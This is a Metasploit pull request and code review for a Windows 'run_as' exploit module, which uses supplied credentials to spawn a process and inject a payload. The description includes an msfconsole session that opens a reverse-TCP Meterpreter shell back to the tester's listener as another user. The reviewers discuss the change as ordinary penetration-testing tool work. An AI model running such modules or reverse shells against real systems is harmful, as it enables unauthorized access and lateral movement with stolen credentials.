### PR TITLE
Implement run_as as an exploit, update and fix post/windows/manage/run_as

### PR DESCRIPTION
**Pull request by Meatballs1**
Original run_as module seemed to have a number of flaws:
- It didnt think you could use CreateProcessWithLogonW as a non-administrator - which you can?! At least on 2k8 and Win7...
- It attempts to output a file to the user's home folder to grab command line output, but the runas user won't have access to that folder by default (unless running as an admin etc). 
- It didn't specify a DOMAIN, you were unable to pass DOMAIN\username to the calls, but it didn't mention they could be in UPN format user@domain. 

Exploit module can't use native meterpreter calls to inject shellcode as we have to use the handles returned, so can't do x64 injection from x86. Therefore just sticking to x86.
## Example

```
msf exploit(run_as) > sessions

Active sessions
===============

  Id  Type                   Information         Connection
  --  ----                   -----------         ----------
  1   meterpreter x86/win32  TEST\bob @ USER-PC  192.168.5.101:8686 -> 192.168.5.100:49187 (192.168.5.100)

msf exploit(run_as) > show options

Module options (exploit/windows/local/run_as):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   APPLICATION_NAME                     no        Application to be executed (lpApplicationName)
   COMMAND_LINE                         no        Command line to execute (lpCommandLine)
   DOMAIN              TEST             no        Domain to login with
   PASSWORD            Password1        yes       Password to login with
   SESSION             -1               yes       The session to run this module on.
   USER                monkey           yes       Username to login with
   USE_CUSTOM_COMMAND  false            yes       Specify custom APPLICATION_NAME and COMMAND_LINE


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.5.101    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(run_as) > run

[*] Started reverse handler on 192.168.5.101:4444 
[+] Process started successfully, PID: 3444
[*] Sending stage (770048 bytes) to 192.168.5.100
[+] Started thread in target process
[*] Meterpreter session 2 opened (192.168.5.101:4444 -> 192.168.5.100:49200) at 2015-01-27 21:14:30 +0000

meterpreter > getuid
Server username: TEST\monkey
```
## Verification - Exploit
- [x] Get a meterpreter session (x86)
- [x] Set the username and password for local administrator account
- [x] Exploit - Verify you get a shell as that user
- [x] Get a meterpreter session (x64)
- [x] Set the username and password for local administrator account
- [x] Exploit - Verify you get a shell as that user
- [x] Set the domain, username, and password for domain account
- [x] Exploit - Verify you get a shell as that user
- [x] Unset the domain, set username@domain, and password for domain account
- [x] Exploit - Verify you get a shell as that user
## Verification - Post
- [x] Get a meterpreter session 
- [x] Set username/password etc
- [x] Set CMDOUT True
- [x] Set CMD whoami
- [x] Run - Verify output is target username password
- [x] Get a meterpreter session [SYSTEM]
- [x] Run - Verify output is target username password

### CODE REVIEW

File: lib/msf/core/post/windows/runas.rb [hunk 1]
```diff
@@ -34,4 +40,204 @@ def shell_exec(command, args)
...
+  #   CreateProcess function
+  #
+  # @raise [ArgumentError] If the command_line is too large
+  #
+  # @return [True] True if the command_line is within the correct bounds
+  #
+  def check_command_length(application_name, command_line, max_length)
+    if application_name.nil? && command_line.nil?
+      raise ArgumentError, 'Both application_name and command_line are nil'
+    elsif application_name.nil? && command_line && command_line.length > MAX_PATH
```
Comment (Meatballs1) [inline lib/msf/core/post/windows/runas.rb]: Think this is invalid, the wording from MSDN, think MAX_PATH only occurs to the module path (ie argv[0])


`The maximum length of this string is 32K characters. If lpApplicationName is NULL, the module name portion of lpCommandLine is limited to MAX_PATH characters.`

**Comment by bcook-r7** [comment]
Would you like to write an rspec for the new methods?

**Comment by Meatballs1** [comment]
Not for the ones containing railgun calls! :P

**Comment by Meatballs1** [comment]
Although the priv.rb one looks like a good example!

**Comment by Meatballs1** [comment]
Self challenge excepted!

**Comment by bcook-r7** [comment]
wow! great

**Comment by bcook-r7** [comment]
The specs run fine, but I had trouble getting this to work otherwise. I'm sure PEBKAC. Assigning back to @wchen-r7

**Comment by wchen-r7** [comment]
Wait, I just realized @Meatballs1 keeps unassigning me. @bcook-r7 I don't think he wants me to do it.

**Comment by Meatballs1** [comment]
You hadn't commented so I assume you weren't looking at it :)

**Comment by wchen-r7** [comment]
I will do it.

**Comment by Meatballs1** [comment]
:hugs

File: modules/post/windows/manage/run_as.rb [hunk 2]
```diff
@@ -44,130 +46,83 @@ def initialize(info={})
...
-        cs = rg_adv.CreateProcessWithLogonW(user,nil,pass,"LOGON_WITH_PROFILE",nil, cmdstr,
-          "CREATE_UNICODE_ENVIRONMENT",nil,path,startinfo,16)
-      else #system with correct token privs enabled
-        print_status("Executing CreateProcessAsUserA...we are SYSTEM")
-        l = rg_adv.LogonUserA(user,nil,pass, "LOGON32_LOGON_INTERACTIVE",
-          "LOGON32_PROVIDER_DEFAULT", 4)
-        cs = rg_adv.CreateProcessAsUserA(l["phToken"], nil, cmdstr, nil, nil, false,
-          "CREATE_NEW_CONSOLE", nil, nil, startinfo, 16)
+      print_status("Executing CreateProcessAsUserA...we are SYSTEM")
+      pi = create_process_as_user(domain, user, password, nil, cmdstr)
```
Comment (wchen-r7) [inline modules/post/windows/manage/run_as.rb]: So do we not want to allow the domain as optional anymore? It looks like it used to be?

File: modules/post/windows/manage/run_as.rb [hunk 3]
```diff
@@ -44,130 +46,83 @@ def initialize(info={})
...
     rescue
       return false
     end
   end
 
-  def run
-    # set some instance vars
-    @IsAdmin = false
-    @host_info = session.sys.config.sysinfo
+  def touch(path)
```
Comment (wchen-r7) [inline modules/post/windows/manage/run_as.rb]: I hit this backtrace:

```
msf post(run_as) > run

[-] Post failed: Rex::Post::Meterpreter::RequestError core_channel_write: Operation failed: The parameter is incorrect.
[-] Call stack:
[-]   /Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/channel.rb:241:in `_write'
[-]   /Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/channel.rb:208:in `write'
[-]   /Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb:34:in `syswrite'
[-]   /Users/sinn3r/rapid7/msf/lib/msf/core/post/file.rb:281:in `write_file'
[-]   /Users/sinn3r/rapid7/msf/modules/post/windows/manage/run_as.rb:68:in `touch'
[-]   /Users/sinn3r/rapid7/msf/modules/post/windows/manage/run_as.rb:95:in `run'
```

**Comment by wchen-r7** [comment]
The post module should just execute a command, right? Not actually giving me a meterpreter session.

**Comment by bcook-r7** [comment]
It appears that the backtrace is occurring because meterpreter_bins <= 0.0.13 doesn't like the 0-byte write and is returning an exception (the branch this is based on). I fixed this a while back: https://github.com/rapid7/meterpreter/pull/117

Try again based on the latest meterpreter_bins, or at least version 0.0.14

File: modules/post/windows/manage/run_as.rb (hunk 2 above)
Comment (Meatballs1) [inline modules/post/windows/manage/run_as.rb]: Domain is optional in LogonUser so a nil domain will be interpreted as such. The previous module doesn't allow you to specify a domain at all, unless you use username@domain.com UPN format. In which case domain must be nil.

**Comment by Meatballs1** [comment]
>  `Get a meterpreter session [SYSTEM]`
> The post module should just execute a command, right? Not actually giving me a meterpreter session.

Sorry its not clear I mean to say, 'From a SYSTEM meterpreter, run the post module. The results should contain the target username'.

**Comment by Meatballs1** [comment]
Should probably mark the meterpreter wishlist as done if this lands:

>•Execute with login credentials: When a user is no longer online it is overkill to PSEXEC (which would just net a SYSTEM shell anyways with MSF) and “RunAs” isn’t supported since it requires a password at a prompt, so adding a simple CreateProcesWithLogon feature would help with reviving dead tokens *[IN PROGRESS] * #4649 

https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Wishlist

**Comment by wchen-r7** [comment]
Ah ok, thanks guys.

**Comment by wchen-r7** [comment]
OK everything works for me, merging it.

**Comment by Meatballs1** [comment]
Cheers me dears!

**Pull request merged**